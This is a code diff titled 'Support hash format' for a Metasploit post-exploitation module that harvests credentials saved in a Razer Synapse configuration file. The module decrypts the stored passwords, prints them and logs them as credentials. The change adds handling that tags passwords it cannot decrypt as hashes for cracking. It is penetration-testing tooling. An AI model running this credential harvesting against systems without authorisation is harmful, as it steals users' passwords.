Support hash format
parent
b038760be7
commit
fc1417809e
|
@ -71,9 +71,15 @@ class Metasploit3 < Msf::Post
|
||||||
session_id: session_db_id,
|
session_id: session_db_id,
|
||||||
origin_type: :session,
|
origin_type: :session,
|
||||||
private_data: opts[:password],
|
private_data: opts[:password],
|
||||||
private_type: :password,
|
private_type: opts[:type],
|
||||||
username: opts[:user]
|
username: opts[:user]
|
||||||
}.merge(service_data)
|
}
|
||||||
|
|
||||||
|
if opts[:type] == :nonreplayable_hash
|
||||||
|
credential_data[:jtr_format] = 'ODF-AES-opencl'
|
||||||
|
end
|
||||||
|
|
||||||
|
credential_data.merge!(service_data)
|
||||||
|
|
||||||
login_data = {
|
login_data = {
|
||||||
core: create_credential(credential_data),
|
core: create_credential(credential_data),
|
||||||
|
@ -85,7 +91,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
# Loop throuhg config, grab user and pass
|
# Loop throuhg config, grab user and pass
|
||||||
def get_creds(config)
|
def get_creds(config)
|
||||||
creds = {}
|
creds = []
|
||||||
|
|
||||||
return nil if !config.include?('<Version>')
|
return nil if !config.include?('<Version>')
|
||||||
|
|
||||||
|
@ -93,12 +99,17 @@ class Metasploit3 < Msf::Post
|
||||||
xml.xpath('//SavedCredentials').each do |node|
|
xml.xpath('//SavedCredentials').each do |node|
|
||||||
user = node.xpath('Username').text
|
user = node.xpath('Username').text
|
||||||
pass = node.xpath('Password').text
|
pass = node.xpath('Password').text
|
||||||
|
type = :password
|
||||||
begin
|
begin
|
||||||
pass = decrypt(pass)
|
pass = decrypt(pass)
|
||||||
rescue OpenSSL::Cipher::CipherError
|
rescue OpenSSL::Cipher::CipherError
|
||||||
# Eh, ok. We tried.
|
type = :nonreplayable_hash
|
||||||
end
|
end
|
||||||
creds[user] = pass
|
creds << {
|
||||||
|
user: user,
|
||||||
|
pass: pass,
|
||||||
|
type: type
|
||||||
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
creds
|
creds
|
||||||
|
@ -121,14 +132,19 @@ class Metasploit3 < Msf::Post
|
||||||
# read the contents of file
|
# read the contents of file
|
||||||
creds = get_creds(contents)
|
creds = get_creds(contents)
|
||||||
unless creds.empty?
|
unless creds.empty?
|
||||||
creds.each_pair do |user, pass|
|
creds.each do |c|
|
||||||
|
user = c[:user]
|
||||||
|
pass = c[:pass]
|
||||||
|
type = c[:type]
|
||||||
|
|
||||||
print_good("Found cred: #{user}:#{pass}")
|
print_good("Found cred: #{user}:#{pass}")
|
||||||
report_cred(
|
report_cred(
|
||||||
ip: razerzone_ip,
|
ip: razerzone_ip,
|
||||||
port: 443,
|
port: 443,
|
||||||
service_name: 'http',
|
service_name: 'http',
|
||||||
user: user,
|
user: user,
|
||||||
password: pass
|
password: pass,
|
||||||
|
type: type
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue